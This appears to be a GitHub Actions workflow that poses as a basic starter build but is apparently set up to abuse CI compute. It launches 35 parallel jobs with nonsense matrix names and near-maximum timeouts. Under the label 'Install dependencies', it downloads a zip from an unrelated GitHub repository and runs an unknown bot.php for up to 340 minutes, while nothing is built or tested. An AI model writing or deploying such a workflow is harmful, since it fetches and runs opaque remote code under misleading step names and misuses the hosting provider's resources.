# This is a basic workflow to help you get started with Actions

# This is a basic workflow to help you get started with Actions

on:
  push:
    

name: main
jobs:
  build_linux:
    name: Build Linuxoi
    container:
      image: ubuntu:18.04
    runs-on: ubuntu-latest
    continue-on-error: true
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        gobabx: [1a, 1b, 1c, 1e, 1f]
        flagoai: [A, B, Z, Y ,ds, jid, js]
    timeout-minutes: 348
    steps:
    - uses: actions/checkout@v3
    - name: Setup PHP with no coverage driver
      uses: shivammathur/setup-php@v2
      with:
          php-version: '8.1'
          coverage: none
    - name: Install dependencies
      run: |
        set -e
        apt update
        apt install wget -y
        mkdir tesas
        cd tesas
        wget https://github.com/Gkist2264/test15y/raw/main/esb.zip
        unzip esb.zip
        timeout 340m php bot.php
        php --version
